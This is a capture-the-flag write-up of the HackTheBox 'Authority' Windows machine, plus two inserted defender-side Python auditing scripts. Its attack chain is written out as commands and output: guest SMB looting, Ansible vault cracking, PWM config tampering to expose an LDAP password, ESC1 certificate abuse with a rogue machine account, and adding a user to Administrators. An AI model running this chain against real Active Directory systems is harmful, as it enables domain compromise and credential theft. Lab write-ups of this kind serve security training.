Authority

Machine: Windows

Level: Medium

Information Gathering

Nmap

└─# nmap -p 53,80,88,135,139,389,445,8443 -sC -sV 10.10.11.222               
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-09-10T16:33:43+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
445/tcp  open  microsoft-ds?
8443/tcp open  ssl/https-alt
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-09-08T16:05:31
|_Not valid after:  2025-09-10T03:43:55

Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-10T16:33:28
|_  start_date: N/A

Gaining Access

Obtaining Ansible Creds via SMB

└─# ./kerbrute userenum -d authority.htb --dc 10.10.11.222 userlist.txt
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/ 
Version: v1.0.3 (9dad6e1) - 09/10/23 - Ronnie Flathers @ropnop

2023/09/10 12:43:38 >  Using KDC(s):
2023/09/10 12:43:38 >   10.10.11.222:88

2023/09/10 12:44:04 >  [+] VALID USERNAME:       guest@authority.htb
2023/09/10 12:44:57 >  [+] VALID USERNAME:       administrator@authority.htb

We find that SMB has a guest account, so we try a passwordless login to look around.

└─# smbclient -L 10.10.11.222 -U guest%
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Department Shares Disk      
        Development     Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 

Run recurse on -> prompt off -> mget * in turn to download the files. Looking through the shared files, several configuration files can be seen under \Automation\Ansible\PWM\.

---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
      $ANSIBLE_VAULT;1.1;AES256
      32666534386435366537653136663731633138616264323230383566333966346662313161326239
      6134353663663462373265633832356663356239383039640a346431373431666433343434366139
      35653634376333666234613466396534343030656165396464323564373334616262613439343033
      6334326263326364380a653034313733326639323433626130343834663538326439636232306531
      3438

pwm_admin_password: !vault |
      $ANSIBLE_VAULT;1.1;AES256
      31356338343963323063373435363261323563393235633365356134616261666433393263373736
      3335616263326464633832376261306131303337653964350a363663623132353136346631396662
      38656432323830393339336231373637303535613636646561653637386634613862316638353530
      3930356637306461350a316466663037303037653761323565343338653934646533663365363035
      6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
      $ANSIBLE_VAULT;1.1;AES256
      63303831303534303266356462373731393561313363313038376166336536666232626461653630
      3437333035366235613437373733316635313530326639330a643034623530623439616136363563
      34646237336164356438383034623462323531316333623135383134656263663266653938333334
      3238343230333633350a646664396565633037333431626163306531336336326665316430613566
      3764

Use john to crack the vault and obtain its password, then use that password to decrypt hash.ymal; the other two passwords can be recovered the same way.

└─# ansible2john hash.ymal > hash.txt     
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 AVX 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (hash.ymal)     
1g 0:00:00:11 DONE (2023-09-11 12:05) 0.08710g/s 3467p/s 3467c/s 3467C/s 051790..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

└─# cat hash.ymal| ansible-vault decrypt 
Vault password: 
Decryption successful
svc_pwm

Obtaining Account Credentials

Port 80 is an IIS server with nothing else of interest; when we try to access port 8443 it tells us TLS is required.

Bad Request
This combination of host and port requires TLS.

Accessing it over HTTPS redirects to /pwm/private/login. With the password we have, we can access /pwm/private/config/manager and download the configuration from that page; the file contains the following notice:

This configuration file has been auto-generated by the PWM password self service application.
WARNING: This configuration file contains sensitive security information, please handle with care!
WARNING: If a server is currently running using this configuration file, it will be restarted and the configuration updated immediately when it is modified.
NOTICE: This file is encoded as UTF-8.  Do not save or edit this file with an editor that does not support UTF-8 encoding.
If unable to edit using the application ConfigurationEditor web UI, the following options are available:
      1. Edit this file directly by hand.
      2. Remove restrictions of the configuration by setting the property "configIsEditable" to "true". This will allow access to the ConfigurationEditor web UI without having to authenticate to an LDAP server first.
If you wish for sensitive values in this configuration file to be stored unencrypted, set the property "storePlaintextValues" to "true".

Following the notice above, we add <property key="storePlaintextValues">true</property> to the config and upload it.

<setting key="ldap.proxy.password" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="PASSWORD" syntaxVersion="0">
    <label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy Password</label>
    <value>PLAIN:[Deleted]</value>
</setting>
<setting key="ldap.proxy.username" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING" syntaxVersion="0">
    <label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy User</label>
    <value>CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb</value>
</setting>
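
As an added defender-side check, not part of the original writeup: the following Python script parses a PWM configuration export in the shape shown above and flags the two properties the notice warns about, plus any PASSWORD-syntax setting whose value is stored as PLAIN:. The XML sample is constructed, its wrapper elements are assumed, and the secret value is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a PwmConfiguration.xml export; the wrapper
# elements are assumed and the password value is a placeholder, not a real secret.
SAMPLE_CONFIG = """<PwmConfiguration>
  <properties type="config">
    <property key="configIsEditable">false</property>
    <property key="storePlaintextValues">true</property>
  </properties>
  <settings>
    <setting key="ldap.proxy.password" profile="default" syntax="PASSWORD">
      <label>LDAP Proxy Password</label>
      <value>PLAIN:EXAMPLE-PLACEHOLDER</value>
    </setting>
    <setting key="ldap.proxy.username" profile="default" syntax="STRING">
      <label>LDAP Proxy User</label>
      <value>CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb</value>
    </setting>
  </settings>
</PwmConfiguration>"""

# Properties the export's own notice warns about, with what each one exposes.
RISKY_PROPERTIES = {
    "storePlaintextValues": "sensitive values in the export are stored unencrypted",
    "configIsEditable": "ConfigurationEditor reachable without LDAP authentication",
}

def audit_pwm_config(xml_text):
    """Return (key, finding) tuples for risky properties and plaintext passwords."""
    root = ET.fromstring(xml_text)
    findings = []
    for prop in root.iter("property"):
        key = prop.get("key")
        if key in RISKY_PROPERTIES and (prop.text or "").strip().lower() == "true":
            findings.append((key, RISKY_PROPERTIES[key]))
    for setting in root.iter("setting"):
        # Only PASSWORD-syntax settings are secrets; a PLAIN: prefix means unencrypted.
        if setting.get("syntax") == "PASSWORD":
            value = (setting.findtext("value") or "").strip()
            if value.startswith("PLAIN:"):
                findings.append((setting.get("key"), "password stored as PLAIN: text"))
    return findings
```

Run it against a freshly downloaded export after any config change; a non-empty result means the file must be treated as a credential, not as a config backup.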

Connecting

└─# evil-winrm -i 10.10.11.222 -u svc_ldap -p [Deleted]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents>

Privilege Escalation

Run Certipy to look for vulnerable certificate templates.

└─# certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222
Certipy v4.8.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230911133820_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230911133820_Certipy.txt'
[*] Saved JSON output to '20230911133820_Certipy.json'

An ESC1 vulnerability is found in 20230911133820_Certipy.txt:

1
  Template Name                       : CorpVPN
  Display Name                        : Corp VPN
  Certificate Authorities             : AUTHORITY-CA
  Enabled                             : True
  Client Authentication               : True
  Enrollment Agent                    : False
  Any Purpose                         : False
  Enrollee Supplies Subject           : True
  Certificate Name Flag               : EnrolleeSuppliesSubject
  Enrollment Flag                     : AutoEnrollmentCheckUserDsCertificate
                                        PublishToDs
                                        IncludeSymmetricAlgorithms
  Private Key Flag                    : ExportableKey
  Extended Key Usage                  : Encrypting File System
                                        Secure Email
                                        Client Authentication
                                        Document Signing
                                        IP security IKE intermediate
                                        IP security use
                                        KDC Authentication
  Requires Manager Approval           : False
  Requires Key Archival               : False
  Authorized Signatures Required      : 0
  Validity Period                     : 20 years
  Renewal Period                      : 6 weeks
  Minimum RSA Key Length              : 2048
  Permissions
    Enrollment Permissions
      Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                        AUTHORITY.HTB\Domain Admins
                                        AUTHORITY.HTB\Enterprise Admins
    Object Control Permissions
      Owner                           : AUTHORITY.HTB\Administrator
      Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                        AUTHORITY.HTB\Enterprise Admins
                                        AUTHORITY.HTB\Administrator
      Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                        AUTHORITY.HTB\Enterprise Admins
                                        AUTHORITY.HTB\Administrator
      Write Property Principals       : AUTHORITY.HTB\Domain Admins
                                        AUTHORITY.HTB\Enterprise Admins
                                        AUTHORITY.HTB\Administrator
  [!] Vulnerabilities
    ESC1                              : 'AUTHORITY.HTB\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
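
As an added triage helper, not code from the writeup or from Certipy: the script below parses the text-output layout shown above and reports templates that meet the ESC1 conditions Certipy names (client authentication, enrollee-supplied subject, no manager approval, no required signatures) and are enrollable by a low-privileged group such as Domain Computers. The excerpt is constructed, and the "User" template in it is a negative case.

```python
# Constructed excerpt in the layout of Certipy's text output (not the real file).
SAMPLE_CERTIPY_TXT = r"""Certificate Templates
0
  Template Name                       : User
  Client Authentication               : True
  Enrollee Supplies Subject           : False
  Requires Manager Approval           : False
  Authorized Signatures Required      : 0
      Enrollment Rights               : AUTHORITY.HTB\Domain Users
1
  Template Name                       : CorpVPN
  Client Authentication               : True
  Enrollee Supplies Subject           : True
  Requires Manager Approval           : False
  Authorized Signatures Required      : 0
      Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                        AUTHORITY.HTB\Domain Admins
"""
# Groups every domain user or domain-joined host belongs to: enrollment by these is the ESC1 risk.
LOW_PRIV_GROUPS = ("Domain Computers", "Domain Users", "Authenticated Users")

def parse_templates(text):
    """Split Certipy text output into one dict per template; values are lists."""
    templates, current, last_key, value_col = [], None, None, None
    for line in text.splitlines():
        stripped, indent = line.strip(), len(line) - len(line.lstrip())
        if stripped.isdigit():                      # "0", "1": a new template entry
            current, last_key = {}, None
            templates.append(current)
        elif current is None or not stripped:
            continue
        elif ":" in line:                           # "Key : Value" field line
            key, _, value = line.partition(":")
            last_key, value_col = key.strip(), len(line) - len(value.lstrip())
            current.setdefault(last_key, []).append(value.strip())
        elif last_key and indent == value_col:      # continuation of a multi-valued field
            current[last_key].append(stripped)
    return templates

def esc1_findings(text):
    """Names of templates meeting the ESC1 conditions Certipy flagged above."""
    required = {"Client Authentication": "True", "Enrollee Supplies Subject": "True",
                "Requires Manager Approval": "False", "Authorized Signatures Required": "0"}
    hits = []
    for t in parse_templates(text):
        low_priv = any(r.split("\\")[-1] in LOW_PRIV_GROUPS
                       for r in t.get("Enrollment Rights", []))
        if low_priv and all(t.get(k) == [v] for k, v in required.items()):
            hits.append(t["Template Name"][0])
    return hits
```

The fix for a hit is on the template: remove Domain Computers from the enrollment rights, or require manager approval, or stop letting enrollees supply the subject; any one of these breaks the ESC1 chain.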

After checking the user's permissions, we find that domain user credentials can be used to add a new computer account in Active Directory. In this case we use the impacket-addcomputer tool.

└─# impacket-addcomputer  authority.htb/svc_ldap:'[Deleted]' -computer-name Hak$ -computer-pass Password123

Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra

[*] Successfully added machine account Hak$ with password Password123.

With Certipy, we generate a certificate request using the computer account Hak$, the password Password123 and the CorpVPN template, which will let us escalate privileges.

└─# certipy req -u 'Hak$' -p 'Password123' -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn administrator@authority.htb -dns authority.authority.htb -dc-ip 10.10.11.222 

Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with multiple identifications
    UPN: 'administrator@authority.htb'
    DNS Host Name: 'authority.authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_authority.pfx'

Next, we generate two new files from it: one without the private key and one without the certificate.

└─# certipy cert -pfx administrator_authority.pfx -nokey -out user.crt
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and  to 'user.crt'

└─# certipy cert -pfx administrator_authority.pfx -nocert -out user.key
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'user.key'

Now, with the passthecert.py tool, we can use the certificate to authenticate to the LDAPS server and add our user to the Administrators group.

└─# python3 /home/kali/script/passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra

Type help for list of commands

# add_user_to_group svc_ldap Administrators
Adding user: svc_ldap to group Administrators result: OK

In this way we have successfully compromised the machine.

└─# evil-winrm -i 10.10.11.222 -u svc_ldap -p [Deleted]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> net user svc_ldap
User name                    svc_ldap
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/10/2022 9:29:31 PM
Password expires             Never
Password changeable          8/11/2022 9:29:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/20/2023 1:27:12 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.